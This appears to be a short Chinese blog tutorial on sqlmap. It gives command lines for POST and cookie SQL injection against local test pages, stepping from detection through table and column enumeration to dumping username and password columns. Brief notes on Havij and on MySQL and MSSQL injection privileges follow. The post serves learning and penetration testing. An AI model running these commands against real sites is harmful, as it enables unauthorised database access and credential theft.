Sqlmap安装和使用

Sqlmap特点:适合多种数据库

 

Python下载地址:http://www.newasp.net/soft/63733.html

Sqlmap下载地址:https://github.com/sqlmapproject/sqlmap/zipball/master

Sqlmap postcookie注入

 

sqlmap.py -u http://127.0.0.1:88/p.php --data "u=admin&p=123456"   //判断注入(一直按enter

sqlmap.py -u http://127.0.0.1:88/p.php --data "u=admin&p=123456"  --dbs //猜解数据库名

sqlmap.py -u http://127.0.0.1:88/p.php --data "u=admin&p=123456" --tables //猜解表名

sqlmap.py -u http://127.0.0.1:88/p.php --data "u=admin&p=123456" --tables -D "fanke" ///猜解fanke数据库下的表名

 

sqlmap.py -u http://127.0.0.1:88/p.php --data "u=admin&p=123456" --columns -T "user" //猜解fanke数据库下的表名user中的列名

 

 

sqlmap.py -u http://127.0.0.1:88/p.php --data "u=admin&p=123456" --dump -C  “username,password”  -T user      //猜解数据

 

 

Sqlmap coookie注入实例

 

sqlmap.py -u http://127.0.0.1:81/1/1/shownews.asp --cookie "id=27" --level 2    

 

//判断是否存在cookie注入

sqlmap.py -u http://127.0.0.1:81/1/1/shownews.asp --cookie "id=27" --level 2 --tables        //猜解表名

sqlmap.py -u http://127.0.0.1:81/1/1/shownews.asp --cookie "id=27" --level 2 --columns -T admin //猜解admin表名下的列名

sqlmap.py -u http://127.0.0.1:81/1/1/shownews.asp --cookie "id=27" --level 2 --dump -C "username,password" -T admin //获取指定列名admin下的数据

 

穿山甲Post注入

穿山甲cookie注入

 

Mysql 跨库注入

条件:root权限 跨数据库查询

Mssql注入

Sa:最高权限 文件管理,数据库管理,命令执行,注册表管理等

Db:一般权限 文件操作,数据库

Public:最低权限 数据库

 

posted @ 2016-04-06 00:44  沐风先生  阅读(266)  评论(0编辑  收藏  举报